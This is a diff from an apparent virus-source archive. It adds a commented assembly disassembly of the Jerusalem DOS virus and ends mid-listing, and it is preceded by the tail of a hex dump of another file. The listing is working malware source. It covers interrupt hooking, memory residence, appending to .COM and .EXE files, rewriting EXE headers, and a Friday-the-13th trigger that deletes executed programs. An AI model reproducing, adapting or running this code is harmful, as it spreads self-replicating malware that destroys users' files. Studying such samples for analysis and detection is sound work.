06-0A 00 80 3E 0A 00 0A 75 [yCY[C~....>...u +08A0 19 C6 06 0A 00 01 FE 06-09 00 80 3E 09 00 02 75 .F....~....>...u +08B0 09 C6 06 09 00 00 FE 06-0B 00 C3 64 74 61 EB 3A .F....~...Cdtak: +08C0 90 49 42 4D 20 58 33 2E-32 00 02 02 01 00 02 70 .IBM X3.2......p +08D0 00 D0 02 FD 02 00 09 00-02 00 00 00 00 00 00 00 .P.}............ +08E0 00 00 00 00 00 00 00 00-00 00 00 00 02 DF 02 25 ............._.% +08F0 02 12 2A FF 50 F6 00 02-CD 19 FA 33 C0 8E C0 8E ..*.Pv..M.z3@.@. +0900 D0 BC 00 7C 8E D8 BB C0-07 C7 06 78 00 2F 00 89 P<.|.X;@.G.x./.. +0910 1E 7A 00 8E DB 8B 16 1E-00 88 16 20 00 CD 13 73 .z..[...... 
.M.s +0920 03 E9 D8 00 BE 0B 00 8B-0C D0 ED 86 E9 89 0E 2B .iX.>....Pm.i..+ +0930 00 8A 44 05 32 E4 F7 64-0B 03 44 03 03 44 11 A3 ..D.2dwd..D..D.# +0940 24 00 BB 00 7E E8 DC 00-8C C3 B8 70 00 8E C0 B8 $.;.~h\..C8p..@8 +0950 20 00 F7 64 06 8B 0C 03-C1 48 F7 F1 01 06 24 00 .wd....AHwq..$. +0960 8A 0E 2A 00 A1 24 00 E8-07 00 06 1F EA 00 00 70 ..*.!$.h....j..p +0970 00 53 50 8A C1 F6 26 2B-00 A2 29 00 58 F7 26 2B .SP.Av&+.").Xw&+ +0980 00 F7 74 0D FE C2 88 16-28 00 52 33 D2 F7 74 0F .wt.~B..(.R3Rwt. +0990 88 16 21 00 A3 26 00 5A-8A 0E 29 00 02 D1 8B 44 ..!.#&.Z..)..Q.D +09A0 0D 40 3A D0 76 06 2A 06-28 00 8A C8 8A C1 8B 16 .@:Pv.*.(..H.A.. +09B0 26 00 B1 06 D2 E6 0A 36-28 00 8B CA 86 E9 8B 16 &.1.Rf.6(..J.i.. +09C0 20 00 B4 02 50 CD 13 58-72 32 28 06 29 00 76 25 .4.PM.Xr2(.).v% +09D0 98 F7 26 2D 00 03 D8 FE-06 21 00 8A 16 21 00 3A .w&-..X~.!...!.: +09E0 54 0F B2 01 88 16 28 00-72 AE C6 06 21 00 00 FF T.2...(.r.F.!... +09F0 06 26 00 EB A3 5B C3 BE-B3 01 EB 03 BE C5 01 E8 .&.k#[C>3.k.>E.h +0A00 13 00 BE D4 01 E8 0D 00-B4 00 CD 16 B4 01 CD 16 ..>T.h..4.M.4.M. +0A10 75 FA E9 E3 FE AC 0A C0-74 09 B4 0E BB 07 00 CD uzic~,.@t.4.;..M +0A20 10 EB F2 C3 B1 01 E8 48-FF 56 8B FB 26 8B 47 1C .krC1.hH.V.{&.G. +0A30 33 D2 F7 34 FE C0 A2 2A-00 BE 9D 01 B9 0B 00 F3 3Rw4~@"*.>..9..s +0A40 A6 75 B4 26 8B 47 3A A3-22 00 8B FB 83 C7 20 BE &u4&.G:#"..{.G > +0A50 A8 01 B9 0B 00 F3 A6 75-9E 5E C3 49 42 4D 42 49 (.9..s&u.^CIBMBI +0A60 4F 20 20 43 4F 4D 49 42-4D 44 4F 53 20 20 43 4F O COMIBMDOS CO +0A70 4D 0D 0A 4E 6F 6E 2D 53-79 73 74 65 6D 20 64 69 M..Non-System di +0A80 73 6B 00 0D 0A 42 4F 4F-54 20 66 61 69 6C 75 72 sk...BOOT failur +0A90 65 00 0D 0A 52 65 70 6C-61 63 65 20 61 6E 64 20 e...Replace and +0AA0 70 72 65 73 73 20 61 6E-79 20 6B 65 79 20 77 68 press any key wh +0AB0 65 6E 20 72 65 61 64 79-00 90 90 90 55 AA 00 00 en ready....U*.. +0AC0 00 00 00 00 00 00 00 00-00 00 00 00 70 FF F7 7F ............p.w. +0AD0 FF F7 7F FF 00 00 00 00-00 00 00 00 00 00 00 00 .w.............. 
+0AE0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0AF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B30 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B40 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B50 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B60 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BA0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BC0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BE0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C30 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C40 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C50 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C60 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 
+0CA0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0CB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FD FF ..............}. +0CC0 FF 03 40 00 05 60 00 07-80 00 09 A0 00 0B C0 00 ..@..`..... ..@. +0CD0 0D E0 00 0F 00 01 11 20-01 13 F0 FF 15 60 01 17 .`..... ..p..`.. +0CE0 80 01 19 A0 01 1B C0 01-1D E0 01 1F 00 02 21 20 ... ..@..`....! +0CF0 02 23 40 02 25 60 02 27-80 02 29 A0 02 2B C0 02 .#@.%`.'..) .+@. +0D00 2D E0 02 2F F0 FF 31 20-03 33 40 03 35 60 03 37 -`./p.1 .3@.5`.7 +0D10 80 03 39 A0 03 3B C0 03-3D E0 03 3F 00 04 41 20 ..9 .;@.=`.?..A +0D20 04 43 40 04 45 60 04 47-F0 FF F7 7F FF F7 0F 00 .C@.E`.Gp.w..w.. +0D30 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D40 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D50 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D60 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DA0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DC0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DE0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus33.asm b/MSDOS/Virus.MSDOS.Unknown.virus33.asm new file mode 100644 index 00000000..6bba105e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus33.asm 
@@ -0,0 +1,897 @@ +The following is a disassembled, structured and commented listing of the +Jerusalem .COM and .EXE infector virus. All comments, structure inclusions +and explanations are copyright John McAfee and Associates 1988, all rights +reserved. DO NOT distribute without contacting John at 408 988 3832, or +write : + + John McAfee + 4423 Cheeney Street + Santa Clara, CA 95054 + +(NOTE: This is an extraordinarily poor disassembly. We purposely spent +little time on it since it is a common virus that has been thoroughly +studied by dozens of others. - In other words - we were lazy). + + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. 
ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) 
+ INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV 
AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... + JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; 
+;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ; + JMP N08_90 ; + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? + PUSH CX ;*** COMMENTS SOLICITED **** - WS + PUSH SI ; + MOV CX,4001H ; YES IT IS (1/2 HOUR) BUT THE FUCKER NEVER + REP LODSB ;GETS EXECUTED!!!!!!!!!!! -RLP + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? 
+ MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... 
+ JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECTION PROCESS OCCURS HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV 
AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... + INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE (OBVIOUSLY) + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV 
CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE - YES + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. 
